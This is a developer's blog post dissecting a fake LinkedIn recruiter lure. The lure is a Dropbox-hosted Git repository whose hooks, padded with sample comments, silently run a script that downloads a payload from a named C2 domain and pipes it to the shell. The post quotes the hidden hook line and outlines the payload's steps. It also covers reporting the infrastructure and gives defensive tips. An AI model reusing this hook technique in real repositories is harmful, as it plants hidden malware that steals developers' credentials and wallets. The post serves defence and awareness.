How I Took Down a Lamer's Attempt at Stealing My Data

Note on names

All personal names in this post have been changed. The profile that contacted me is almost certainly a stolen or fabricated identity used by the threat actors — naming it publicly here would only hurt an innocent person whose photo or bio was scraped, while doing nothing to slow the operators behind the campaign.

Last week I got a message on LinkedIn from a guy calling himself Marcus Vale, listed as a "Blockchain Talent Acquisition Specialist." He pitched me on a medical supply chain platform — traceability, prescription control, regulatory compliance. Real buzzwords, professional tone, the whole nine yards.

I replied with my own MVP (I'd already built something similar), proposed a call, and he came back with a link to a Dropbox archive. He wanted me to "review the project roadmap" before the meeting. Standard enough in this industry. Except nothing about this was standard.

The archive contained a weaponized Git repository designed to silently execute malware the moment you run any git command inside it. Here's the full breakdown of how I caught it, reverse-engineered it, and reported it to burn their infrastructure.

The Pitch

The initial message was textbook professional outreach. Vague enough to seem broad, specific enough to seem real. He mentioned a "web-based medical supply chain platform" and asked if I'd be interested in building the MVP. No red flags in the text itself — if anything, it was better written than most recruiter messages.

After I responded with interest and a link to my own working prototype, he sent back the hook: a Dropbox link to a .tar.gz archive, along with a detailed explanation of how his team's repository was organized. The master branch had the roadmap. The NDA branch had the agreement to sign. He wanted me to read the docs first, then switch to the NDA branch.

The social engineering

The instruction to git checkout NDA is the trigger. That single command fires the post-checkout hook, which executes the malware. The entire documentation, the roadmap, the "NDA on a separate branch" structure — it's all designed to make you run that one command.

The Bait

I extracted the archive in a sandboxed environment and found what appeared to be a legitimate project repository: a README.md, an executive summary, a PRD, technical architecture docs, wireframes, a timeline, legal notes — the full package for a medical supply chain web app. Well-written, detailed, and completely fake.

The documentation described an MVP where governments register drug types, manufacturers create medicine units with UUIDs, pharmacies transfer ownership, and citizens verify authenticity. React or Vue frontend, Node.js or Go API, PostgreSQL. Eleven-week timeline. Four development phases. Everything you'd expect from a real project kickoff. That's the point — you're not supposed to look deeper.

The Trap

I looked deeper. Inside .git/hooks/, three files were marked executable: commit-msg, post-checkout, and pre-push. Each one was padded with hundreds of lines of standard Git sample comments — the same boilerplate you'd see in any repo. But buried in each file was a single uncommented line:

# ... 90 lines of standard Git sample comments ...
sh "$(dirname "$0")/post-rebase.sample" >/dev/null 2>&1 &
# ... more innocent-looking comments ...

One line. Silently spawns post-rebase.sample in the background, redirects all output to /dev/null, and backgrounds it with &. You'd never see it run. You'd never see output. It just happens.

The post-rebase.sample file — which doesn't need to be executable itself because the hooks call it via sh — contains the actual payload logic:

# Detects OS (Linux/macOS vs Windows)
# Downloads remote code from C2 server:
# cleverstack-ext30341.vercel.app
# Pipes it directly to sh (Unix) or PowerShell (Windows)
# Creates a marker file
# Deletes commit-msg, post-checkout, pre-push, and itself

Evidence destruction

After execution, the script deletes all four hook files. If you checked .git/hooks/ after the fact, you'd see nothing suspicious. The malware cleans up after itself.

The Kill Chain

Here's the full attack flow, from LinkedIn DM to compromised machine:

LinkedIn DM

→

Dropbox .tar.gz

→

git checkout NDA

→

post-checkout hook

→

C2 payload

→

RAT installed

Step 1 — Social engineering

Fake recruiter contacts developer on LinkedIn with a legitimate-sounding project. Establishes rapport, references your actual skills.

Step 2 — Distribution

Shares a Dropbox link to a .tar.gz archive. The file looks like project documentation. It's actually a full Git repository with weaponized hooks.

Step 3 — Trigger

Instructs the victim to "review the master branch, then checkout the NDA branch." The git checkout command fires the post-checkout hook. A commit or push would also trigger it.

Step 4 — Execution

The hook silently runs post-rebase.sample, which detects the OS, downloads a payload from cleverstack-ext30341.vercel.app, and pipes it to the shell. The payload is a RAT (Remote Access Trojan).

Step 5 — Exfiltration & cleanup

The RAT harvests browser credentials, crypto wallet data, SSH keys, environment variables, and anything else of value. The hook files are deleted to cover tracks.

Step 6 — I report everything

Instead of getting owned, I filed abuse reports to Vercel, Dropbox, and LinkedIn. Their infrastructure burns.

What This Actually Is

This isn't some amateur phishing attempt. It's part of a well-documented campaign called "Contagious Interview", attributed to North Korea's Lazarus Group (APT38). Multiple security firms have published independent analyses confirming the pattern:

Microsoft Defender Experts (March 11, 2026) published the most comprehensive breakdown to date. Their report confirms the campaign has been active since at least December 2022, with attackers impersonating recruiters from cryptocurrency trading firms and AI solution providers. Microsoft identified the malware families as OtterCookie (a reconnaissance and exfiltration backdoor) and FlexibleFerret (a secondary payload). Critically, their findings describe a VS Code trust exploitation vector: when victims open the cloned repo in VS Code and trust the author, the editor automatically executes the repository's task configuration file — fetching the backdoor without any manual git command. My case used the older Git hooks approach, but the goal is the same: API tokens, cloud credentials, crypto wallet data, and source code.

ReversingLabs tracked a supply-chain variant they named "Graphalgo" starting May 2025. They uncovered 192 malicious packages — 106 on npm, 86 on PyPI — using naming patterns like graphalgo, graphnetworkx, and bigmathutils. One package accumulated over 4,200 weekly downloads by publishing a clean version first, then pushing a malicious update. The final payload was a RAT capable of arbitrary command execution and specifically designed to check for the MetaMask browser extension. Git commit timestamps across these repos consistently aligned with GMT+9 — North Korean working hours.

Bitdefender caught another wave when the attackers targeted one of their own researchers with a fake LinkedIn offer for a "decentralized cryptocurrency exchange." They played it out in a sandbox and documented a multi-stage payload: an obfuscated JavaScript info-stealer, Python keyloggers, a .NET binary that disables Windows Defender and installs a Tor proxy, and a final backdoor with hardcoded browser extension IDs for crypto wallet theft.

The playbook is always the same: fake recruiter, professional-looking repo, hidden malware in the build/install/hook pipeline, and a social engineering reason for you to execute it. The targets are always developers — especially those in Web3, DeFi, and blockchain — because one compromised dev machine can mean access to private keys worth millions.

The healthcare theme in my case is a newer variant. Earlier campaigns used crypto exchange projects, AI platforms, NFT marketplaces, and decentralized apps as bait. The constant is the delivery mechanism: make a developer run code they trust.

Pattern recognition

The Microsoft report specifically notes that Contagious Interview actors are evolving their lures beyond crypto. The medical supply chain theme I encountered fits this trajectory — the attackers are broadening their target pool while keeping the same technical infrastructure.

The Counterattack

I couldn't hack them back (that's illegal, and also pointless). But I could burn their infrastructure by reporting every link in the chain:

1. Vercel — Kill the C2 server

Filed a detailed abuse report to abuse@vercel.com with the full domain (cleverstack-ext30341.vercel.app), the hook code that references it, and context on the Lazarus Group campaign. Vercel typically takes these down fast.

2. Dropbox — Kill the distribution

Reported the shared archive link to Dropbox's abuse team with the full technical breakdown. Without the Dropbox link, the recruiter has no way to deliver the payload.

Reported "Marcus Vale" through LinkedIn's profile reporting flow. These profiles are either fake or compromised, and they're the entry point for the entire attack.

Why this works

Killing any one of these three — the C2 server, the distribution link, or the recruiter profile — breaks the chain. Killing all three forces the attacker to rebuild everything from scratch: a new Vercel deployment, a new file host, a new fake identity. That costs them time and effort, and every hour their infrastructure is down is an hour they're not compromising other developers.

How to Protect Yourself

If you're a developer getting recruited via LinkedIn, here's what to watch for:

Never run git commands inside an untrusted repository on your main machine. If someone sends you a repo to review, extract it and read the files with a text editor. Or use a disposable VM. The entire attack depends on you executing git checkout, git commit, or git push.

Always inspect .git/hooks/ before doing anything. Run grep -rn '^[^#]' .git/hooks/ to find any uncommented lines in hook scripts. Legitimate sample hooks are 100% commented out. A single active line is a red flag.

Be suspicious of repos distributed as archives. Real companies use GitHub, GitLab, or Bitbucket. A .tar.gz on Dropbox is unusual — and it's specifically chosen because archived repos preserve the .git directory, including hooks. A GitHub clone wouldn't carry executable hooks.

Watch for the "review then switch branch" pattern. If a recruiter asks you to read docs on one branch and then checkout another, that's a designed trigger for post-checkout hooks. There's no legitimate reason to structure a repo this way.

Check the git log. This repo had exactly one commit: e403d74 init. One commit for a supposedly mature project with a dozen documents? That's a squashed history — a technique to hide what changed over time.

Final Thoughts

The irony is that "Marcus" (or whoever is behind that profile) called himself a "Blockchain Talent Acquisition Specialist." He was acquiring something, just not talent. He wanted my browser credentials, my crypto wallets, my SSH keys, and anything else the RAT could scrape from my machine.

I've been building in Web3 for years. I've done smart contract security reviews, post-mortems on compromised servers, and architectural audits on DeFi protocols. So when a recruiter sends me a .tar.gz and asks me to checkout a branch, my first instinct is to look at the hooks — not run them.

Not every developer has that reflex. That's why I'm publishing this. If you're in blockchain, DeFi, or any crypto-adjacent space, you are a high-value target. Act like one.

Stay paranoid. Inspect everything. And if a recruiter's first move is sending you a file to download instead of a Zoom link — walk away.